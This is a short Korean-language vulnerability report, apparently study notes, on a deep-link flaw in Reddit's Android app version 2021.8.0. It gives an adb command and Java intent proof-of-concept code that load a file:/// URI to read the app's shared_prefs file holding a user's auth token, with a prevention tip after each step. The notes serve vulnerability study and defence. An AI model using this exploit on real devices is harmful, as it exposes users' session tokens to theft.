#1 대상 cve report
#2 cve 개요
app name: reddit
version: 2021.8.0
OS: Android 11
#3 POC 절차
또 딥링크!
1) 외부에서 접근 가능한 액티비티 찾기 (예방: exported: false)
intent 중 data http://www.redit.com을 사용하는 등 Url 사용하는 것을 확인할 수 있음
2) 그 안에서 인앱브라우저에 접속하는 코드 찾기 (예방: X)
data를 가져와서 처리하는 부분
3) 인앱 브라우저 링크 대신 file:///data/data/.../shared_prefs/사용자 토큰 내용.xml (예방법: file 로 시작하는 링크 제어)
adb shell am start -n "com.reddit.frontpage/com.reddit.frontpage.RedditDeepLinkActivity" -d "file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.Strong-Sun628.xml"
4) POC 코드
Intent intent = new Intent();
intent.setClassName("com.reddit.frontpage", "com.reddit.frontpage.RedditDeepLinkActivity");
intent.setData(Uri.parse("file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.UserName.xml"));
startActivity(intent);
#4 참고 자료
학식 - 정보보안 전문 블로그 :: [AOS 취약점 진단] 10강 - 취약한 액티비티 컴포넌트 점검 (tistory.com)